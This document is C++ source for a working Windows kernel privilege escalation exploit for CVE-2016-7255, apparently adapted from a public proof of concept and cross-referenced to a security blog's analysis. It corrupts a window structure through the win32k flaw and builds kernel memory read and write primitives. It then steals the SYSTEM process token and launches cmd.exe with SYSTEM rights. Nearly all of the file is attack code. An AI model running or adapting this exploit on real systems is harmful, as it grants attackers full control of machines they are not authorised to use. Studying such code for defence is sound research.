//NOTE The 'Step' numbers in comments are cross references to http://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/

#include "stdafx.h"
#include "types.h"
#include "CVE-2016-7255.h"

#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"Version.lib")

extern "C" unsigned int NtUserGetAncestor(HWND hnd, unsigned int flag, unsigned int sysCallNumber);
extern "C" unsigned long long NtUserSetWindowLongPtr(HWND hnd, unsigned long long offset, unsigned long long value, unsigned int sysCallNumber);


lHMValidateHandle pHmValidateHandle = NULL;

unsigned int cbWndExtraOffset = 0;
unsigned int ExtraMemoryOffset = 0;
unsigned int spwndParentOffset = 0x058;

unsigned int UniqueProcessIdOffset = 0;
unsigned int TokenOffset = 0;
unsigned int ActiveProcessLinks = 0;
unsigned int KProcessOffset = 0;
unsigned int NtUserSetWindowLongPtrSyscallNumber = 0;
unsigned int NtUserGetAncestorSyscallNumber = 0;

unsigned long long SystemSecurityTokenAddr = NULL;
unsigned long long MySecTokenAddr = NULL;
unsigned long long MyEPROCESSAddr = NULL;

HWND primary = NULL;
HWND secondary = NULL;

int __cdecl main(int argc, char** argv)
{
	//Step 3
	DetectOSAndSetVerOffsets();

	//Step 4
	FindHMValidateHandle();

	FindMemoryOffsets();

	//Step 6
	CreateTargetWindows();
	//Steps 7 and 8 are implemented in the ReadKernelMemory and WriteKernelMemory functions
	THRDESKHEAD *primaryTagWND = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	unsigned long long primaryKernelAddr = (unsigned long long) primaryTagWND->pSelf;
	unsigned long long corruptionTarget = primaryKernelAddr + cbWndExtraOffset + 3;
	printf("Target cbWndExtra fields kernel memory address: 0x%llx, ready to go?\n", corruptionTarget);
	getchar();
	CorruptByte(corruptionTarget);
	printf("Primary Window cbWndExtra value corrupted!\n");

	//Step 9
	FindSecurityTokens();

	wchar_t strSysSecToken[5] = { 0x00 };
	strSysSecToken[3] = (SystemSecurityTokenAddr >> 48) & 0xFFFF;
	strSysSecToken[2] = (SystemSecurityTokenAddr >> 32) & 0xFFFF;
	strSysSecToken[1] = (SystemSecurityTokenAddr >> 16) & 0xFFFF;
	strSysSecToken[0] = (SystemSecurityTokenAddr >> 0) & 0xFFFF;
	printf("Security token to steal: 0x%llx\n", SystemSecurityTokenAddr);
	//Step 9.4
	WriteKernelMemory(MyEPROCESSAddr + TokenOffset, strSysSecToken);
	
	printf("SYSTEM please.\n");
	system("cmd.exe");

	wchar_t strOrigSecToken[5] = { 0x00 };
	strOrigSecToken[3] = (MySecTokenAddr >> 48) & 0xFFFF;
	strOrigSecToken[2] = (MySecTokenAddr >> 32) & 0xFFFF;
	strOrigSecToken[1] = (MySecTokenAddr >> 16) & 0xFFFF;
	strOrigSecToken[0] = (MySecTokenAddr >> 0) & 0xFFFF;

	WriteKernelMemory(MyEPROCESSAddr + TokenOffset, strOrigSecToken);
	
	wchar_t size[1] = { 0x00 };
	WriteKernelMemory(corruptionTarget, size);
	
	//Step 10
	DestroyWindow(primary);
	DestroyWindow(secondary);
	return 0;
}

void DetectOSAndSetVerOffsets() {

	printf("Finding OS version\n");
	void *baseInfo;
	unsigned long verInfoSize = GetFileVersionInfoSize(TEXT("kernel32.dll"), &verInfoSize);

	void *fileVersionInfo = new char[verInfoSize];
	GetFileVersionInfo(TEXT("kernel32.dll"), 0, verInfoSize, fileVersionInfo);
	unsigned int baseInfoSize = 0;
	VerQueryValue(fileVersionInfo, TEXT("\\"), &baseInfo, &baseInfoSize);

	VS_FIXEDFILEINFO *verInfo = (VS_FIXEDFILEINFO *)baseInfo;
	DWORD dwMajorVersionMsb = HIWORD(verInfo->dwFileVersionMS);
	DWORD dwMajorVersionLsb = LOWORD(verInfo->dwFileVersionMS);

	if (dwMajorVersionMsb == 6 && dwMajorVersionLsb == 1) {
		NtUserSetWindowLongPtrSyscallNumber = 0x133a;
		NtUserGetAncestorSyscallNumber = 0x10b2;
		UniqueProcessIdOffset = 0x180;
		TokenOffset = 0x208;
		ActiveProcessLinks = 0x188;
		KProcessOffset = 0x50;
		printf("Windows 7\n");
	}
	else if (dwMajorVersionMsb == 6 && dwMajorVersionLsb == 2) {
		NtUserSetWindowLongPtrSyscallNumber = 0x13d9;
		NtUserGetAncestorSyscallNumber = 0x10b2;
		UniqueProcessIdOffset = 0x2e0;
		TokenOffset = 0x348;
		ActiveProcessLinks = 0x2e8;
		KProcessOffset = 0x98;
		printf("Windows 8\n");
	}
	else if (dwMajorVersionMsb == 6 && dwMajorVersionLsb == 3) {
		NtUserSetWindowLongPtrSyscallNumber = 0x140d;
		NtUserGetAncestorSyscallNumber = 0x10B3;
		UniqueProcessIdOffset = 0x2e0;
		TokenOffset = 0x348;
		ActiveProcessLinks = 0x2e8;
		KProcessOffset = 0x98;
		printf("Windows 8.1\n");
	}
	else if (dwMajorVersionMsb == 10 && dwMajorVersionLsb == 0) {
		NtUserSetWindowLongPtrSyscallNumber = 0x146e;
		NtUserGetAncestorSyscallNumber = 0x10b4;
		UniqueProcessIdOffset = 0x2e8;
		TokenOffset = 0x358;
		ActiveProcessLinks = 0x2f0;
		KProcessOffset = 0x98;
		printf("Windows 10\n");
	}
}

BOOL FindHMValidateHandle() {
	HMODULE hUser32 = LoadLibraryA("user32.dll");
	if (hUser32 == NULL) {
		printf("Failed to load user32");
		return FALSE;
	}
	//Step 4.2
	BYTE* pIsMenu = (BYTE *)GetProcAddress(hUser32, "IsMenu");
	if (pIsMenu == NULL) {
		printf("Failed to find location of exported function 'IsMenu' within user32.dll\n");
		return FALSE;
	}
	unsigned int uiHMValidateHandleOffset = 0;
	for (unsigned int i = 0; i < 0x1000; i++) {
		BYTE* test = pIsMenu + i;
		if (*test == 0xE8) {
			uiHMValidateHandleOffset = i + 1;
			break;
		}
	}
	if (uiHMValidateHandleOffset == 0) {
		printf("Failed to find offset of HMValidateHandle from location of 'IsMenu'\n");
		return FALSE;
	}

	unsigned int addr = *(unsigned int *)(pIsMenu + uiHMValidateHandleOffset);
	unsigned int offset = ((unsigned int)pIsMenu - (unsigned int)hUser32) + addr;
	//The +11 is to skip the padding bytes as on Windows 10 these aren't nops
	//obviously a more elegant solution would be to scan memory for the true start...
	pHmValidateHandle = (lHMValidateHandle)((ULONG_PTR)hUser32 + offset + 11);
	return TRUE;
}

void FindMemoryOffsets() {
	//Step 4.1
	WNDCLASSEX wnd = { 0x0 };
	wnd.cbSize = sizeof(wnd);
	wnd.cbWndExtra = 0x10;
	wnd.lpszClassName = TEXT("ExtraMemOffset");
	wnd.lpfnWndProc = MainWProc;
	int result = RegisterClassEx(&wnd);
	if (!result)
	{
		printf("RegisterClassEx error: %d\r\n", GetLastError());
	}


	HWND extraMemFindWindow = CreateWindowEx(0, wnd.lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
	
	void * extraMemAddr = pHmValidateHandle(extraMemFindWindow, 1);
	
	SetWindowLong(extraMemFindWindow, 0, 0x31323334);
	//Step 4.3
	for (unsigned int i = 0; i < 0x1000; i++) {
		unsigned long* data = (unsigned long*)((unsigned long long)extraMemAddr + i);
		if (*data == 0x31323334) {
			printf("Found extra memory offset: 0x%X\n", i);
			ExtraMemoryOffset = i;
			break;
		}
	}
	//Step 4.4
	DestroyWindow(extraMemFindWindow);

	//Step 4.5
	WNDCLASSEX wndCbHuntA = { 0x0 };
	wndCbHuntA.cbSize = sizeof(wndCbHuntA);
	wndCbHuntA.cbWndExtra = 0x118;
	wndCbHuntA.lpszClassName = TEXT("wndCbHuntA");
	wndCbHuntA.lpfnWndProc = MainWProc;
	result = RegisterClassEx(&wndCbHuntA);
	if (!result) {
		printf("RegisterClassEx error: %d\r\n", GetLastError());
	}

	WNDCLASSEX wndCbHuntB = { 0x0 };
	wndCbHuntB.cbSize = sizeof(wndCbHuntB);
	wndCbHuntB.cbWndExtra = 0x130;
	wndCbHuntB.lpszClassName = TEXT("wndCbHuntB");
	wndCbHuntB.lpfnWndProc = MainWProc;
	result = RegisterClassEx(&wndCbHuntB);
	if (!result) {
		printf("RegisterClassEx error: %d\r\n", GetLastError());
	}

	//Step 4.6
	HWND cbOffsetFindWindowA = CreateWindowEx(0, wndCbHuntA.lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
	HWND cbOffsetFindWindowB = CreateWindowEx(0, wndCbHuntB.lpszClassName, NULL, 20, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);

	//Step 4.7
	void *cbOffsetFindWindowAAddr = pHmValidateHandle(cbOffsetFindWindowA, 1);
	void *cbOffsetFindWindowBAddr = pHmValidateHandle(cbOffsetFindWindowB, 1);
	//Step 4.8
	for (unsigned int i = 0; i < 0x1000; i++) {
		unsigned short* data = (unsigned short*)((unsigned long long)cbOffsetFindWindowAAddr + i);
		if (*data == 0x118) {
			unsigned short* check = (unsigned short*)((unsigned long long)cbOffsetFindWindowBAddr + i);
			if (*check == 0x130) {
				printf("Found cbWndExtra offset: 0x%X\n", i);
				cbWndExtraOffset = i;
				break;
			}
		}
	}
	//Step 4.9
	DestroyWindow(cbOffsetFindWindowB);
	DestroyWindow(cbOffsetFindWindowA);
}

LRESULT CALLBACK MainWProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	return DefWindowProc(hWnd, uMsg, wParam, lParam);
}

void CreateTargetWindows() {
	//Step 6.1
	printf("Creating target primary and secondary windows\n");

	WNDCLASSEX wnd = { 0x0 };
	wnd.cbSize = sizeof(wnd);
	wnd.lpszClassName = TEXT("MainWClass");
	wnd.lpfnWndProc = MainWProc;
	int result = RegisterClassEx(&wnd);
	if (!result)
	{
		printf("\tRegisterClassEx error: %d\r\n", GetLastError());
	}

	HWND spares[0x100];
	for (unsigned int i = 0; i < 0x100; i++) {
		HWND spare = CreateWindowEx(0, wnd.lpszClassName, TEXT("WORDS"), 0, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
		spares[i] = spare;
	}

	//Step 6.2
	for (unsigned int i = 0; i < 0x100; i++) {
		
		THRDESKHEAD *hTagOne = (THRDESKHEAD *)pHmValidateHandle(spares[i], 1);
		unsigned long long hTagOneAddr = (unsigned long long) hTagOne->pSelf;

		for (unsigned int j = 0; j < 0x100; j++) {
			if (i != j) {
				THRDESKHEAD *hTagTwo = (THRDESKHEAD *)pHmValidateHandle(spares[j], 1);
				unsigned long long hTagTwoAddr = (unsigned long long) hTagTwo->pSelf;
				if (hTagOneAddr > hTagTwoAddr) {
					unsigned long long diff = hTagOneAddr - hTagTwoAddr;
					if (diff < 0x3fd00) {
						printf("\tPrimary hTagWnd address: 0x%llx\n", hTagTwoAddr);
						printf("\tSecondary hTagWnd address: 0x%llx\n", hTagOneAddr);
						primary = spares[j];
						secondary = spares[i];
						break;
					}
				}
				else {
					unsigned long long diff = hTagTwoAddr - hTagOneAddr;
					if (diff < 0x3fd00) {
						printf("\tPrimary hTagWnd address: 0x%llx\n", hTagOneAddr);
						printf("\tSecondary hTagWnd address: 0x%llx\n", hTagTwoAddr);
						primary = spares[i];
						secondary = spares[j];
						break;
					}
				}
			}

		}
		if (primary != NULL) {
			printf("\tTargets found!\n");
			break;
		}
	}
	printf("\tHWDN primary = 0x%llx\n", primary);
	printf("\tHWND secondary = 0x%llx\n", secondary);
	//Step 6.3
	for (unsigned int i = 0; i < 0x100; i++) {
		HWND tmp = spares[i];
		if (tmp != primary && tmp != secondary) {
			DestroyWindow(tmp);
		}
	}
	printf("\tSpare windows destroyed\n");
	SetWindowText(secondary, TEXT("text"));
}

//Step 7
unsigned int ReadKenelMemory(unsigned long long addr) {
	THRDESKHEAD *hTagOne = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	THRDESKHEAD *hTagTwo = (THRDESKHEAD *)pHmValidateHandle(secondary, 1);
	//Step 7.1
	unsigned long long orig = *((unsigned long long*)pHmValidateHandle(secondary, 1) + spwndParentOffset);
	unsigned long long spwndParentAddr = (unsigned long long)hTagTwo->pSelf + spwndParentOffset;
	unsigned long long extraMemAddr = (unsigned long long) hTagOne->pSelf + ExtraMemoryOffset;
	//Step 7.2
	unsigned long long distance = spwndParentAddr - extraMemAddr;
	SetLastError(0);
	//Step 7.3
	unsigned long long prev = NtUserSetWindowLongPtr(primary, distance, addr, NtUserSetWindowLongPtrSyscallNumber);
	if (prev == 0 && GetLastError() != 0) {
		printf("NtUSerSetWIndowLongPtr failed with 0x%X, 0x%llx, 0x%llx and error: 0x%X", primary, distance, addr, GetLastError());
	}
	//Step 7.4
	unsigned int read = NtUserGetAncestor(secondary, GA_PARENT, NtUserGetAncestorSyscallNumber);
	//Step 7.5
	NtUserSetWindowLongPtr(primary, distance, orig, NtUserSetWindowLongPtrSyscallNumber);
	return read;
}

unsigned long long ReadPtrFromKernelMemory(unsigned long long addr) {
	unsigned int LowAddr = ReadKenelMemory(addr);
	unsigned int HighAddr = ReadKenelMemory(addr + 4);
	unsigned long long Addr = ((unsigned long long)HighAddr << 32) + LowAddr;
	return Addr;
}

//Step 8
void WriteKernelMemory(unsigned long long addr, LPWSTR content) {
	THRDESKHEAD *hTagOne = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	THRDESKHEAD *hTagTwo = (THRDESKHEAD *)pHmValidateHandle(secondary, 1);
	//Step 8.1
	LARGE_UNICODE_STRING* bufferOriginalAddr = (LARGE_UNICODE_STRING*)((unsigned long long)pHmValidateHandle(secondary, 1) + 0xd8);
	PWSTR contents = bufferOriginalAddr->Buffer;
	//Step 8.2
	unsigned long long extraMemAddr = (unsigned long long) hTagOne->pSelf + ExtraMemoryOffset;
	unsigned long long bufferAddr = (unsigned long long) hTagTwo->pSelf + (cbWndExtraOffset - 8);
	unsigned long long diff = bufferAddr - extraMemAddr;
	//Step 8.3
	NtUserSetWindowLongPtr(primary, diff, addr, NtUserSetWindowLongPtrSyscallNumber);
	//Step 8.4
	SetWindowText(secondary, content);
	//Step 8.5
	NtUserSetWindowLongPtr(primary, diff, (unsigned long long)contents, NtUserSetWindowLongPtrSyscallNumber);
}

//Step 9
void FindSecurityTokens() {
	printf("Looking for current processes security token and SYSTEM security token\n");
	//Step 9.1
	THRDESKHEAD *primaryTagWND = (THRDESKHEAD *)pHmValidateHandle(primary, 1);
	unsigned long long pti = (unsigned long long)primaryTagWND->h.pti;
	printf("\tSearching for current processes EPROCESS structure\n");
	
	unsigned long long threadTagPointer = ReadPtrFromKernelMemory(pti);
	printf("\ttagTHREAD == %llx\n", threadTagPointer);
	
	unsigned long long kapcStateAddr = ReadPtrFromKernelMemory(threadTagPointer + KProcessOffset);
	printf("\tkapc_stateAddr == %llx\n", kapcStateAddr);
	
	MyEPROCESSAddr = ReadPtrFromKernelMemory(kapcStateAddr + 0x20);
	
	printf("\teprocess == %llx\n", MyEPROCESSAddr);
	
	MySecTokenAddr = ReadPtrFromKernelMemory(MyEPROCESSAddr + TokenOffset);
	printf("\tOriginal security token pointer: 0x%llx\n", MySecTokenAddr);
	
	printf("Searching for SYSTEM security token address\n");

	unsigned long long nextProc = ReadPtrFromKernelMemory(MyEPROCESSAddr + ActiveProcessLinks) - ActiveProcessLinks;
	printf("\tNext eprocess address: 0x%llx\n", nextProc);
	
	unsigned int pid = ReadKenelMemory(nextProc + UniqueProcessIdOffset);
	printf("\tFound pid: 0x%X\n", pid);
	
	while (true) {
		nextProc = ReadPtrFromKernelMemory(nextProc + ActiveProcessLinks) - ActiveProcessLinks;
		printf("\tNext eprocess address: 0x%llx\n", nextProc);

		pid = ReadKenelMemory(nextProc + UniqueProcessIdOffset);
		printf("\tFound pid: 0x%X\n", pid);
		//Step 9.2
		if (pid == 4) {
			printf("\ttarget process found!\n");
			SystemSecurityTokenAddr = ReadPtrFromKernelMemory(nextProc + TokenOffset);
			break;
		}
	}
}

//Everything post here is modified from @TinySecEx's PoC for the issue: https://github.com/tinysec/public/tree/master/CVE-2016-7255
void CorruptByte(unsigned long long addr) {
	//Step 6.4
	WNDCLASSEXW wndClass = { 0 };

	wndClass.cbSize = sizeof(wndClass);
	wndClass.lpfnWndProc = DefWindowProcW;
	wndClass.lpszClassName = TEXT("cve-2016-7255");

	if (!SUCCEEDED(RegisterClassExW(&wndClass))) {
		return;
	}

	HWND parent = CreateWindowEx(0, wndClass.lpszClassName, NULL, WS_OVERLAPPEDWINDOW | WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);

	if (parent == NULL) {
		return;
	}

	HWND child = CreateWindowEx(0, wndClass.lpszClassName, TEXT("child"), WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, parent, NULL, NULL, NULL);

	if (child == NULL) {
		return;
	}

	//Step 6.5 + 6.6
	SetWindowLongPtr(child, GWLP_ID, addr - 0x28);

	//Step 6.7
	ShowWindow(parent, SW_SHOWNORMAL);

	SetParent(child, GetDesktopWindow());

	SetForegroundWindow(child);

	SendAltShiftTab(4);

	SwitchToThisWindow(child, TRUE);

	SendAltShiftEsc();
	int i = 0;
	MSG stMsg = { 0 };
	while (GetMessage(&stMsg, NULL, 0, 0) && i < 20) {

		SetFocus(parent);
		SendAltEsc(20);
		SetFocus(child);
		SendAltEsc(20);

		TranslateMessage(&stMsg);
		DispatchMessage(&stMsg);
		i++;
	}

	DestroyWindow(parent);
	DestroyWindow(child);

}

void KeyAction(unsigned short key, unsigned int dir) {
	INPUT stInput = { 0 };

	stInput.type = INPUT_KEYBOARD;
	stInput.ki.wVk = key;
	stInput.ki.dwFlags = dir;

	SendInput(1, &stInput, sizeof(stInput));
}

void KeyPress(unsigned short key) {
	KeyAction(key, DOWN);
	KeyAction(key, UP);
}

void SendAltShiftEsc()
{
	KeyAction(VK_MENU, DOWN);
	KeyAction(VK_SHIFT, DOWN);

	KeyPress(VK_ESCAPE);
	KeyPress(VK_ESCAPE);

	KeyAction(VK_MENU, UP);
	KeyAction(VK_SHIFT, UP);
}

void SendAltShiftTab(unsigned int count)
{
	KeyAction(VK_MENU, DOWN);
	KeyAction(VK_SHIFT, DOWN);


	for (unsigned int i = 0; i < count; i++)
	{
		KeyPress(VK_TAB);
		Sleep(1000);
	}

	KeyAction(VK_MENU, UP);
	KeyAction(VK_SHIFT, UP);
}

void SendAltEsc(unsigned int count)
{
	for (unsigned int i = 0; i<count; i++)
	{
		KeyAction(VK_MENU, DOWN);

		KeyPress(VK_ESCAPE);
		KeyPress(VK_ESCAPE);

		KeyAction(VK_MENU, UP);

	}
}